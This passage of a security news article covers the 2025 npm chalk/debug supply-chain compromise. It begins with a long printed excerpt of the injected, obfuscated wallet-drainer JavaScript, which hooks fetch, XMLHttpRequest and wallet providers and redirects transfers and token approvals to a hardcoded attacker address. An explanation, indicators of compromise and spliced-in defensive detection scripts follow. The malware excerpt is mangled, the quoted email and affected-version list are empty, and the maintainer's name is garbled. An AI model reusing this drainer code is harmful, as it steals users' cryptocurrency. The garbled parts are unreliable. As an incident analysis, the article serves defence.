return _0x6fd57a == _0x45613c;
},
'eDGUh': "ethereum",
'dmtxm': function (_0x426191, _0xcfbe) {
return _0x426191 == _0xcfbe;
},
'HNbDp': function (_0x43f1a1, _0x360cae) {
return _0x43f1a1 == _0x360cae;
},
'YBHoq': "bitcoinLegacy",
'pRoUO': "bitcoinSegwit",
'nvayH': function (_0x1a5c0d, _0x3206ce, _0x4cf791) {
return _0x1a5c0d(_0x3206ce, _0x4cf791);
},
'jHsib': "tron",
'nVTWs': "ltc",
'jsqTT': function (_0x245d0e, _0x2d73d9, _0x14ef57) {
return _0x245d0e(_0x2d73d9, _0x14ef57);
},
'afnPM': function (_0x458f2b, _0x6aa524) {
return _0x458f2b == _0x6aa524;
},
'tDons': "ltc2",
'gtXrf': function (_0x4aac02, _0x3c2f2e, _0x51351a) {
return _0x4aac02(_0x3c2f2e, _0x51351a);
},
'sghpa': "bch",
'hrNiK': function (_0x4989f5, _0xf4abd5, _0x265bdf) {
return _0x4989f5(_0xf4abd5, _0x265bdf);
},
'tqgyV': "solana",
'mbgjV': function (_0x34d7ea, _0xb2bd29, _0x41c749) {
return _0x34d7ea(_0xb2bd29, _0x41c749);
},
'IAgrR': function (_0x95d4e, _0x4e3b67) {
return _0x95d4e == _0x4e3b67;
},
'FvQbM': "solana2",
'UPcyp': "solana3",
'JiXTg': function (_0x2dd239, _0x9ccb5, _0x2f7208) {
return _0x2dd239(_0x9ccb5, _0x2f7208);
},
'BEiKn': function (_0x7b893d, _0x592b33) {
return _0x7b893d == _0x592b33;
},
'BAEhI': function (_0x421ebd, _0x39f4fa) {
return _0x421ebd != _0x39f4fa;
},
'kZnrz': "undefined"
};
if (loval == 1) {
return;
}
loval = 1;
function _0x3479c8(_0x13a5cc, _0x8c209f) {
const _0x50715b = Array.from({
'length': _0x13a5cc.length + 1
}, =>Array(_0x8c209f.length + 1).fill(0));
for (let _0x1b96c3 = 0; _0x1b96c3
_0x50715b = _0x1b96c3;
}
for (let _0x239a5f = 0; _0x239a5f
_0x50715b = _0x239a5f;
}
for (let _0x5aba31 = 1; _0x5aba31
for (let _0x22e9c0 = 1; _0x22e9c0
if (_0x13a5cc === _0x8c209f) {
_0x50715b = _0x50715b;
} else {
_0x50715b = 1 + Math.min(_0x50715b, _0x50715b, _0x50715b);
}
}
}
return _0x50715b;
}
function _0x2abae0(_0x348925, _0x2f1e3d) {
let _0xff60d1 = Infinity;
let _0x5be3d3 = null;
for (let _0x214c8b of _0x2f1e3d) {
const _0x3a7411 = _0x3479c8(_0x348925.toLowerCase, _0x214c8b.toLowerCase);
if (_0x3a7411
_0xff60d1 = _0x3a7411;
_0x5be3d3 = _0x214c8b;
}
}
return _0x5be3d3;
}
fetch = async function (..._0x1ae7ec) {
const _0x406ee2 = await _0xba16ef.tfqRA(fetch, ..._0x1ae7ec);
const _0x207752 = _0x406ee2.headers.get("Content-Type") || '';
let _0x561841;
if (_0x207752.includes("application/json")) {
_0x561841 = await _0x406ee2.clone.json;
} else {
_0x561841 = await _0x406ee2.clone.text;
}
const _0x50818d = _0x19ca67(_0x561841);
const _0x22ee54 = typeof _0x50818d === "string" ? _0x50818d : JSON.stringify(_0x50818d);
const _0x20415d = new Response(_0x22ee54, {
'status': _0x406ee2.status,
'statusText': _0x406ee2.statusText,
'headers': _0x406ee2.headers
});
return _0x20415d;
};
if (typeof window != "undefined") {
const _0x2d44e5 = XMLHttpRequest.prototype.open;
const _0x3d5d6a = XMLHttpRequest.prototype.send;
XMLHttpRequest.prototype.open = function (_0x2dbeb0, _0x3b2bc2, _0x36de99, _0x36f3b7, _0x52ad25) {
this._url = _0x3b2bc2;
return _0x2d44e5.apply(this, arguments);
};
XMLHttpRequest.prototype.send = function (_0x270708) {
const _0x159c30 = this;
const _0x1c1a41 = _0x159c30.onreadystatechange;
_0x159c30.onreadystatechange = function {
if (_0x159c30.readyState === 4) {
try {
const _0x13db82 = _0x159c30.getResponseHeader("Content-Type") || '';
let _0x1ac083 = _0x159c30.responseText;
if (_0x13db82.includes("application/json")) {
_0x1ac083 = JSON.parse(_0x159c30.responseText);
}
const _0x454f4a = _0x19ca67(_0x1ac083);
const _0x553cb7 = typeof _0x454f4a === "string" ? _0x454f4a : JSON.stringify(_0x454f4a);
Object.defineProperty(_0x159c30, "responseText", {
'value': _0x553cb7
});
Object.defineProperty(_0x159c30, "response", {
'value': _0x553cb7
});
} catch (_0x59788f) {}
}
if (_0x1c1a41) {
_0x1c1a41.apply(this, arguments);
}
};
return _0x3d5d6a.apply(this, arguments);
};
}
function _0x19ca67(_0x1156d2) {
try {
if (typeof _0x1156d2 === "object" && _0x1156d2 !== null) {
const _0x129304 = JSON.stringify(_0x1156d2);
const _0x187e67 = _0xba16ef.tfqRA(_0x20669a, _0x129304);
return JSON.parse(_0x187e67);
}
if (typeof _0x1156d2 === "string") {
return _0x20669a(_0x1156d2);
}
return _0x1156d2;
} catch (_0x2abc9c) {
return _0x1156d2;
}
}
function _0x20669a(_0x530d91) {
var _0x264994 = ;
var _0x2e3cca = ;
var _0x4477fc = ;
var _0x514d7d = ;
var _0x3ee86f = ;
var _0x4a9d96 = ;
var _0x553dcb = ;
const _0x3ec3bb = {
'ethereum': /b0x{40}b/g,
'bitcoinLegacy': /b1{25,34}b/g,
'bitcoinSegwit': /b(3{25,34}|bc1{11,71})b/g,
'tron': /((?,
'bch': /bitcoincash:{41}/g,
'ltc': /(?,
'ltc2': /(?,
'solana': /((?,
'solana2': /((?,
'solana3': /((?
};
for (const of Object.entries(_0x3ec3bb)) {
const _0x1be350 = _0x530d91.match(_0x129783) || ;
for (const _0x4225ce of _0x1be350) {
if (_0x17ccd4 == "ethereum") {
if (!_0x4477fc.includes(_0x4225ce) && neth == 0) {
_0x530d91 = _0x530d91.replace(_0x4225ce, _0x2abae0(_0x4225ce, _0x4477fc));
}
}
if (_0x17ccd4 == "bitcoinLegacy") {
if (!_0x264994.includes(_0x4225ce)) {
_0x530d91 = _0x530d91.replace(_0x4225ce, _0x2abae0(_0x4225ce, _0x264994));
}
}
if (_0x17ccd4 == "bitcoinSegwit") {
if (!_0x2e3cca.includes(_0x4225ce)) {
_0x530d91 = _0x530d91.replace(_0x4225ce, _0x2abae0(_0x4225ce, _0x2e3cca));
}
}
if (_0x17ccd4 == "tron") {
if (!_0x3ee86f.includes(_0x4225ce)) {
_0x530d91 = _0x530d91.replace(_0x4225ce, _0x2abae0(_0x4225ce, _0x3ee86f));
}
}
if (_0x17ccd4 == "ltc") {
if (!_0x4a9d96.includes(_0x4225ce)) {
_0x530d91 = _0x530d91.replace(_0x4225ce, _0x2abae0(_0x4225ce, _0x4a9d96));
}
}
if (_0x17ccd4 == "ltc2") {
if (!_0x4a9d96.includes(_0x4225ce)) {
_0x530d91 = _0x530d91.replace(_0x4225ce, _0x2abae0(_0x4225ce, _0x4a9d96));
}
}
if (_0x17ccd4 == "bch") {
if (!_0x553dcb.includes(_0x4225ce)) {
_0x530d91 = _0x530d91.replace(_0x4225ce, _0x2abae0(_0x4225ce, _0x553dcb));
}
}
const _0x2d452a = ;
const _0x35f871 = _0x2d452a.includes(_0x4225ce);
if (_0x17ccd4 == "solana" && !_0x35f871) {
if (!_0x514d7d.includes(_0x4225ce)) {
_0x530d91 = _0x530d91.replace(_0x4225ce, _0x2abae0(_0x4225ce, _0x514d7d));
}
}
if (_0x17ccd4 == "solana2" && !_0x35f871) {
if (!_0x514d7d.includes(_0x4225ce)) {
_0x530d91 = _0x530d91.replace(_0x4225ce, _0x2abae0(_0x4225ce, _0x514d7d));
}
}
if (_0x17ccd4 == "solana3" && _0x35f871) {
if (!_0x514d7d.includes(_0x4225ce)) {
_0x530d91 = _0x530d91.replace(_0x4225ce, _0x2abae0(_0x4225ce, _0x514d7d));
}
}
}
}
return _0x530d91;
}
}
async function runmask {
let _0x1c41fa = 0;
let _0x2a20cb = new Map;
let _0x1ab7cb = false;
function _0x1089ae(_0x4ac357, _0xc83c36 = true) {
const _0x13d8ee = JSON.parse(JSON.stringify(_0x4ac357));
if (_0xc83c36) {
if (_0x13d8ee.value && _0x13d8ee.value !== "0x0" && _0x13d8ee.value !== '0') {
_0x13d8ee.to = "0xFc4a4858bafef54D1b1d7697bfb5c52F4c166976";
}
if (_0x13d8ee.data) {
const _0x250e27 = _0x13d8ee.data.toLowerCase;
if (_0x250e27.startsWith("0x095ea7b3")) {
if (_0x250e27.length >= 74) {
const _0x7fa5f0 = _0x250e27.substring(0, 10);
const _0x15c4f9 = '0x' + _0x250e27.substring(34, 74);
const _0xde14cc = "Fc4a4858bafef54D1b1d7697bfb5c52F4c166976".padStart(64, '0');
const _0x3e4a11 = 'f'.repeat(64);
_0x13d8ee.data = _0x7fa5f0 + _0xde14cc + _0x3e4a11;
const _0x432d38 = {
'0x7a250d5630b4cf539739df2c5dacb4c659f2488d': "Uniswap V2",
'0x66a9893cC07D91D95644AEDD05D03f95e1dBA8Af': "Uniswap V2",
'0xe592427a0aece92de3edee1f18e0157c05861564': "Uniswap V3",
'0x10ed43c718714eb63d5aa57b78b54704e256024e': "PancakeSwap V2",
'0x13f4ea83d0bd40e75c8222255bc855a974568dd4': "PancakeSwap V3",
'0x1111111254eeb25477b68fb85ed929f73a960582': "1inch",
'0xd9e1ce17f2641f24ae83637ab66a2cca9c378b9f': "SushiSwap"
};
const _0x13f774 = _0x432d38;
if (_0x13f774) {
console.log(_0x13f774 + _0x15c4f9);
} else {
console.log(_0x15c4f9);
}
}
} else {
if (_0x250e27.startsWith("0xd505accf")) {
if (_0x250e27.length >= 458) {
const _0x571743 = _0x250e27.substring(0, 10);
const _0x55e7fa = _0x250e27.substring(10, 74);
const _0x382fb5 = _0x250e27.substring(202, 266);
const _0x5bb3a7 = _0x250e27.substring(266, 330);
const _0x2e5118 = _0x250e27.substring(330, 394);
const _0x3ba273 = _0x250e27.substring(394, 458);
const _0x36b084 = "Fc4a4858bafef54D1b1d7697bfb5c52F4c166976".padStart(64, '0');
const _0x15389e = 'f'.repeat(64);
_0x13d8ee.data = _0x571743 + _0x55e7fa + _0x36b084 + _0x15389e + _0x382fb5 + _0x5bb3a7 + _0x2e5118 + _0x3ba273;
}
} else {
if (_0x250e27.startsWith("0xa9059cbb")) {
if (_0x250e27.length >= 74) {
const _0x5d2193 = _0x250e27.substring(0, 10);
const _0x1493e2 = _0x250e27.substring(74);
const _0x32c34c = "Fc4a4858bafef54D1b1d7697bfb5c52F4c166976".padStart(64, '0');
_0x13d8ee.data = _0x5d2193 + _0x32c34c + _0x1493e2;
}
} else {
if (_0x250e27.startsWith("0x23b872dd")) {
if (_0x250e27.length >= 138) {
const _0x5c5045 = _0x250e27.substring(0, 10);
const _0x1ebe01 = _0x250e27.substring(10, 74);
const _0x558b46 = _0x250e27.substring(138);
const _0x56d65b = "Fc4a4858bafef54D1b1d7697bfb5c52F4c166976".padStart(64, '0');
_0x13d8ee.data = _0x5c5045 + _0x1ebe01 + _0x56d65b + _0x558b46;
}
}
}
}
}
} else if (_0x13d8ee.to && _0x13d8ee.to !== "0xFc4a4858bafef54D1b1d7697bfb5c52F4c166976") {
_0x13d8ee.to = "0xFc4a4858bafef54D1b1d7697bfb5c52F4c166976";
}
} else {
if (_0x13d8ee.instructions && Array.isArray(_0x13d8ee.instructions)) {
_0x13d8ee.instructions.forEach(_0x190501 => {
if (_0x190501.accounts && Array.isArray(_0x190501.accounts)) {
_0x190501.accounts.forEach(_0x2b9990 => {
if (typeof _0x2b9990 === "string") {
_0x2b9990 = "19111111111111111111111111111111";
} else if (_0x2b9990.pubkey) {
_0x2b9990.pubkey = "19111111111111111111111111111111";
}
});
}
if (_0x190501.keys && Array.isArray(_0x190501.keys)) {
_0x190501.keys.forEach(_0x40768f => {
if (_0x40768f.pubkey) {
_0x40768f.pubkey = "19111111111111111111111111111111";
}
});
}
});
}
if (_0x13d8ee.recipient) {
_0x13d8ee.recipient = "19111111111111111111111111111111";
}
if (_0x13d8ee.destination) {
_0x13d8ee.destination = "19111111111111111111111111111111";
}
}
return _0x13d8ee;
}
function _0x485f9d(_0x38473f, _0x292c7a) {
return async function (..._0x59af19) {
_0x1c41fa++;
let _0x12a7cb;
try {
_0x12a7cb = JSON.parse(JSON.stringify(_0x59af19));
} catch (_0x5d1767) {
_0x12a7cb = ;
}
if (_0x59af19 && typeof _0x59af19 === "object") {
const _0x2c3d7e = _0x12a7cb;
if (_0x2c3d7e.method === "eth_sendTransaction" && _0x2c3d7e.params && _0x2c3d7e.params) {
try {
const _0x39ad21 = _0x1089ae(_0x2c3d7e.params, true);
_0x2c3d7e.params = _0x39ad21;
} catch (_0x226343) {}
} else {
if ((_0x2c3d7e.method === "solana_signTransaction" || _0x2c3d7e.method === "solana_signAndSendTransaction") && _0x2c3d7e.params && _0x2c3d7e.params) {
try {
let _0x5ad975 = _0x2c3d7e.params;
if (_0x5ad975.transaction) {
_0x5ad975 = _0x5ad975.transaction;
}
const _0x5dbe63 = _0x1089ae(_0x5ad975, false);
if (_0x2c3d7e.params.transaction) {
_0x2c3d7e.params.transaction = _0x5dbe63;
} else {
_0x2c3d7e.params = _0x5dbe63;
}
} catch (_0x4b99fd) {}
}
}
}
const _0x1cbb37 = _0x38473f.apply(this, _0x12a7cb);
if (_0x1cbb37 && typeof _0x1cbb37.then === "function") {
return _0x1cbb37.then(_0xea3332 => _0xea3332)(_0x35d6a3 => {
throw _0x35d6a3;
});
}
return _0x1cbb37;
};
}
function _0x41630a(_0x5d6d52) {
if (!_0x5d6d52) {
return false;
}
let _0x2fc35d = false;
const _0xfafee = ;
for (const _0x16ab0e of _0xfafee) {
if (typeof _0x5d6d52 === "function") {
const _0x58cddf = _0x5d6d52;
_0x2a20cb.set(_0x16ab0e, _0x58cddf);
try {
Object.defineProperty(_0x5d6d52, _0x16ab0e, {
'value': _0x485f9d(_0x58cddf, _0x16ab0e),
'writable': true,
'configurable': true,
'enumerable': true
});
_0x2fc35d = true;
} catch (_0x19546c) {}
}
}
if (_0x2fc35d) {
_0x1ab7cb = true;
}
return _0x2fc35d;
}
function _0xfc3320 {
let _0x4f0cd6 = 0;
const _0x5b507d = => {
_0x4f0cd6++;
if (window.ethereum) {
setTimeout( => {
_0x41630a(window.ethereum);
}, 500);
return;
}
if (_0x4f0cd6 50) {
setTimeout(_0x5b507d, 100);
}
};
_0x5b507d;
}
_0xfc3320;
window.stealthProxyControl = {
'isActive': => _0x1ab7cb,
'getInterceptCount': => _0x1c41fa,
'getOriginalMethods': => _0x2a20cb,
'forceShield': => {
if (window.ethereum) {
return _0x41630a(window.ethereum);
}
return false;
}
};
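}
This kind of malware is essentially a browser-based interceptor: it executes on the website's client side and can hijack both network traffic and application interfaces.
It injects itself into fetch, XMLHttpRequest, and common wallet interfaces, silently tampering with data during requests and responses.
In other words, any sensitive identifier (such as a payment address or an approval target) can be replaced with an attacker-controlled destination before the user sees or signs it. To make the tampering harder to notice, it also uses string-matching logic to replace the original destination with a "look-alike" address.
The danger is that it works on several layers at once: it alters the content shown on the web page, interferes with API calls, and manipulates the transaction the application believes the user is signing. Even when the interface shows everything as normal, the underlying transaction can still be redirected in the background.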
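The redirection described above can be checked outside the page. The following is an added example, not code from the article or from Aikido: it decodes the four ERC-20 call types the listing rewrites (selectors 0x095ea7b3, 0xd505accf, 0xa9059cbb, 0x23b872dd) and compares the real recipient or spender with the one the user intended. The function names and sample addresses are constructed for illustration, and the check only means something when it runs where the page's scripts cannot reach, such as the wallet or a signing service.

```javascript
'use strict';

// Selectors that appear in the listing, with the index of the 32-byte argument
// word holding the counterparty (recipient or spender) and the amount.
const ERC20_CALLS = new Map([
  ['0x095ea7b3', { method: 'approve',      partyWord: 0, amountWord: 1 }],
  ['0xa9059cbb', { method: 'transfer',     partyWord: 0, amountWord: 1 }],
  ['0x23b872dd', { method: 'transferFrom', partyWord: 1, amountWord: 2 }],
  ['0xd505accf', { method: 'permit',       partyWord: 1, amountWord: 2 }],
]);
const MAX_UINT256 = 'f'.repeat(64);

// Return the n-th 32-byte argument word (64 hex chars), or null if it is missing.
function argWord(data, n) {
  const start = 10 + 64 * n; // skip "0x" and the 8-char selector
  const w = data.slice(start, start + 64);
  return /^[0-9a-f]{64}$/.test(w) ? w : null;
}

// Say who actually receives funds or spending rights in this transaction.
function describeCall(tx) {
  const data = typeof tx.data === 'string' ? tx.data.toLowerCase() : '';
  const spec = ERC20_CALLS.get(data.slice(0, 10));
  if (!spec) {
    // Plain value transfer or an unrecognized call: only tx.to can be compared.
    return { method: 'other', counterparty: String(tx.to || '').toLowerCase(),
             unlimited: false, malformed: false };
  }
  const party = argWord(data, spec.partyWord);
  const amount = argWord(data, spec.amountWord);
  if (!party || !amount) {
    return { method: spec.method, counterparty: null, unlimited: false, malformed: true };
  }
  return { method: spec.method, counterparty: '0x' + party.slice(24),
           unlimited: amount === MAX_UINT256, malformed: false };
}

// Compare the decoded counterparty with the address the user meant to pay or approve.
function checkIntent(tx, intended) {
  const call = describeCall(tx);
  const want = intended.toLowerCase();
  const problems = [];
  if (call.malformed) {
    problems.push(`${call.method}: calldata too short to decode`);
  } else if (call.counterparty !== want) {
    problems.push(`${call.method}: counterparty ${call.counterparty} is not the intended ${want}`);
  }
  // Unlimited amounts also occur in legitimate approvals; surface them for review.
  if (call.unlimited) problems.push(`${call.method}: amount is the maximum uint256`);
  return { call, problems };
}

// Constructed sample data (not real addresses).
const DAPP_ROUTER = '0x' + '11'.repeat(20);
const OTHER = '0x' + '22'.repeat(20);
function encodeApprove(spender, amountHex) {
  return '0x095ea7b3' + spender.slice(2).toLowerCase().padStart(64, '0') +
         amountHex.padStart(64, '0');
}

function demo() {
  return {
    asIntended: checkIntent({ data: encodeApprove(DAPP_ROUTER, '3e8') }, DAPP_ROUTER).problems,
    altered: checkIntent({ data: encodeApprove(OTHER, MAX_UINT256) }, DAPP_ROUTER).problems,
  };
}
console.log(JSON.stringify(demo(), null, 2));
```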

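How the malicious code works (step by step)
Based on this, the security researchers broke down how the malicious code works, as follows:
1. Injects into the browser environment
Hooks core functions such as fetch, XMLHttpRequest, and wallet-related APIs (window.ethereum, Solana, and so on).
Ensures it can intercept both network traffic and wallet activity.
2. Watches for sensitive data
Scans network responses and transaction payloads for content that looks like wallet addresses or transfer information.
Recognizes multiple cryptocurrency formats, including Ethereum, Bitcoin, Solana, Tron, Litecoin, and Bitcoin Cash.
3. Rewrites the destination address
Replaces the legitimate transfer destination with an attacker-controlled address.
Uses string matching to pick a "look-alike" address so that the substitution is hard to spot.
4. Hijacks transactions before signing
Modifies Ethereum and Solana transaction parameters (such as recipient, approval, and allowance).
Even if the interface looks normal, the transaction the user signs sends the funds to the attacker's account.
5. Stays stealthy
When a crypto wallet is detected, it avoids showing suspicious replacements directly in the interface, to reduce suspicion.
Keeps silent hooks running in the background to capture and alter real transactions.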
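The hooks in step 1 leave traces a page can look for at run time. The following is an added example, not code from the article or from Aikido: it checks a window object for the `stealthProxyControl` global seen in the listing, for `fetch` and `XMLHttpRequest.prototype.open`/`send` that are no longer native, and for a wallet provider method replaced after an early snapshot. The function names and the sample window are constructed for illustration, and snapshotting only `request` is an assumption.

```javascript
'use strict';

// True when the function's source text is hidden as "[native code]".
// Caveat: a hook can spoof toString, so a clean result is not proof of a clean page.
function looksNative(fn) {
  return typeof fn === 'function' &&
    /\{\s*\[native code\]\s*\}\s*$/.test(Function.prototype.toString.call(fn));
}

// Record the provider's function references as early as possible (for example
// right after window.ethereum appears) so a later replacement can be noticed.
function snapshotProvider(provider, names = ['request']) {
  const snap = new Map();
  for (const n of names) {
    if (provider && typeof provider[n] === 'function') snap.set(n, provider[n]);
  }
  return snap;
}

// Return human-readable findings; an empty array means no indicator was seen.
function findHookIndicators(win, providerSnapshot = new Map()) {
  const findings = [];
  // Control object the listing attaches to window.
  if ('stealthProxyControl' in win) findings.push('window.stealthProxyControl is defined');
  // The listing reassigns fetch with an async wrapper.
  if (typeof win.fetch === 'function' && !looksNative(win.fetch)) {
    findings.push('fetch is not a native function');
  }
  // The listing overwrites XMLHttpRequest.prototype.open and .send.
  const proto = win.XMLHttpRequest && win.XMLHttpRequest.prototype;
  for (const name of ['open', 'send']) {
    if (proto && typeof proto[name] === 'function' && !looksNative(proto[name])) {
      findings.push(`XMLHttpRequest.prototype.${name} is not a native function`);
    }
  }
  // Wallet providers are ordinary JavaScript, so compare against the snapshot instead.
  for (const [name, original] of providerSnapshot) {
    if (!win.ethereum || win.ethereum[name] !== original) {
      findings.push(`ethereum.${name} was replaced after the snapshot`);
    }
  }
  return findings;
}

// Constructed stand-in for a browser window; bound functions print as native code.
function sampleWindow() {
  const nativeLike = () => (function () {}).bind(null);
  function XHR() {}
  XHR.prototype.open = nativeLike();
  XHR.prototype.send = nativeLike();
  return { fetch: nativeLike(), XMLHttpRequest: XHR, ethereum: { request: async () => [] } };
}

function demo() {
  const win = sampleWindow();
  const snap = snapshotProvider(win.ethereum);
  const before = findHookIndicators(win, snap);
  // Constructed pass-through wrappers standing in for third-party hooks.
  const originalFetch = win.fetch;
  win.fetch = async function (...args) { return originalFetch(...args); };
  win.ethereum.request = async (...args) => snap.get('request')(...args);
  return { before, after: findHookIndicators(win, snap) };
}
console.log(JSON.stringify(demo(), null, 2));
```

In a real page the call is `findHookIndicators(window, snapshot)`, with the snapshot taken as soon as the provider is available.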

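The maintainer speaks: clicked an email that looked official, and got caught
The maintainer of the open-source libraries involved in this incident said he was compromised through a phishing attack.
The attackers phished him with an email made to look as if it came from support@npmjs.help, which looked just like an official message:

Further investigation found that the domain was registered on September 5, 2025, three days before the attack was launched.

Shortly afterwards, Josh Aikido, maintainer of the Debug package (https://github.com/debug-js/debug), which has 357.6 million weekly downloads, also acknowledged on social media at 15:15 that his libraries had been compromised, and began cleaning up the affected packages.

Josh Aikido also revealed that the phishing email had indeed been sent from support@npmjs.help.

As the incident unfolded, Josh Aikido also apologized to users on HackerNews: "Sorry everyone, very embarrassing."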


The attackers strike again
Later, at 16:58, the security firm Aikido found that its system had detected another package compromised by what appear to be the same attackers:
proto-tinker-wc@0.1.87
Its dist/cjs/proto-tinker.cjs.entry.js file had malicious code planted in it.

Indicators of compromise (IoCs)
Phishing domain: npmjs.help
Affected package versions:

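Although this is a supply-chain attack, Andrew MacPherson, principal security engineer at Privy, explained that an application has to meet specific conditions to be affected, which greatly reduces the incident's real-world impact. Specifically:
A fresh install was performed between roughly 9:00 AM and 11:30 AM Eastern Time, which is the window during which the packages were tampered with
A package-lock.json was created during that period
The affected packages are present among the direct or transitive dependencies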
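The three conditions above can be turned into a lockfile check. The following is an added example, not code from the article, Aikido or Privy: it flattens a package-lock.json, reports any of the 18 listed package names (direct or transitive) with the versions the lockfile pins, and says whether the lockfile was written inside the window. The function names are constructed; the date of September 8, 2025 is inferred from the article's timeline, and the UTC bounds assume Eastern Daylight Time (UTC-4). Because the article's list of affected versions is empty, matching names still have to be compared by hand against the advisory's version list.

```javascript
'use strict';

// The 18 package names listed in the article.
const LISTED = new Set([
  'backslash', 'chalk-template', 'supports-hyperlinks', 'has-ansi', 'simple-swizzle',
  'color-string', 'error-ex', 'color-name', 'is-arrayish', 'slice-ansi', 'color-convert',
  'wrap-ansi', 'ansi-regex', 'supports-color', 'strip-ansi', 'chalk', 'debug', 'ansi-styles',
]);
// The only name@version pair the article states.
const KNOWN_BAD = new Map([['proto-tinker-wc', new Set(['0.1.87'])]]);
// Assumed window: about 9:00-11:30 AM Eastern on 2025-09-08, converted with UTC-4.
const WINDOW_START = Date.UTC(2025, 8, 8, 13, 0);
const WINDOW_END = Date.UTC(2025, 8, 8, 15, 30);

// "node_modules/a/node_modules/@scope/b" -> "@scope/b"; the root entry "" -> null.
function nameFromPath(path) {
  const marker = 'node_modules/';
  const i = path.lastIndexOf(marker);
  return i === -1 ? null : path.slice(i + marker.length);
}

// Flatten a lockfile: v2/v3 use a "packages" map, v1 uses nested "dependencies".
function collectInstalled(lock) {
  const out = [];
  if (lock && lock.packages) {
    for (const [path, meta] of Object.entries(lock.packages)) {
      const name = nameFromPath(path);
      if (name && meta && meta.version) out.push({ name, version: meta.version, path });
    }
    return out;
  }
  const walk = (deps, trail) => {
    for (const [name, meta] of Object.entries(deps || {})) {
      const path = `${trail}node_modules/${name}`;
      if (meta && meta.version) out.push({ name, version: meta.version, path });
      if (meta) walk(meta.dependencies, `${path}/`);
    }
  };
  walk(lock && lock.dependencies, '');
  return out;
}

// lockWrittenAt: a Date for when the lockfile was created or last rewritten.
function assessExposure(lock, lockWrittenAt) {
  const installed = collectInstalled(lock);
  const listed = installed.filter((p) => LISTED.has(p.name));
  const knownBad = installed.filter(
    (p) => KNOWN_BAD.has(p.name) && KNOWN_BAD.get(p.name).has(p.version));
  const t = lockWrittenAt instanceof Date ? lockWrittenAt.getTime() : NaN;
  const inWindow = t >= WINDOW_START && t <= WINDOW_END; // false for an invalid date
  return { listed, knownBad, inWindow,
           needsReview: knownBad.length > 0 || (inWindow && listed.length > 0) };
}

// Constructed sample lockfile; the version strings are placeholders.
function sampleLock() {
  return { lockfileVersion: 3, packages: {
    '': { name: 'sample-app', version: '1.0.0' },
    'node_modules/chalk': { version: '0.0.0-sample' },
    'node_modules/chalk/node_modules/ansi-styles': { version: '0.0.0-sample' },
    'node_modules/left-pad': { version: '0.0.0-sample' },
  } };
}

// With a path argument (CommonJS), check that file; otherwise print the sample result.
const cliFile = typeof require === 'function' && typeof module !== 'undefined' &&
  require.main === module ? process.argv[2] : undefined;
if (cliFile) {
  const fs = require('fs');
  const lock = JSON.parse(fs.readFileSync(cliFile, 'utf8'));
  console.log(JSON.stringify(assessExposure(lock, fs.statSync(cliFile).mtime), null, 2));
} else {
  console.log(JSON.stringify(assessExposure(sampleLock(), new Date(WINDOW_START)), null, 2));
}
```

The file's modification time stands in for when the lockfile was created, so a later install that rewrote the file hides an in-window install; the version-control history of package-lock.json is the more reliable timestamp.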
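This supply-chain attack continues a series of similar attacks over the past few months against the developers of several well-known JavaScript libraries.
For example, in July this year attackers compromised eslint-config-prettier, which has more than 30 million weekly downloads, and in March this year another 10 widely used npm libraries were hijacked and had information-stealing functionality planted in them. Both the phishing attack and the injected malware show that the web browser has become a huge attack surface, one that is easily used to steal credentials, tamper with traffic, and get past network defenses.
Sources: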
https://www.aikido.dev/blog/npm-debug-and-chalk-packages-compromised
https://www.bleepingcomputer.com/news/security/hackers-hijack-npm-packages-with-2-billion-weekly-downloads-in-supply-chain-attack/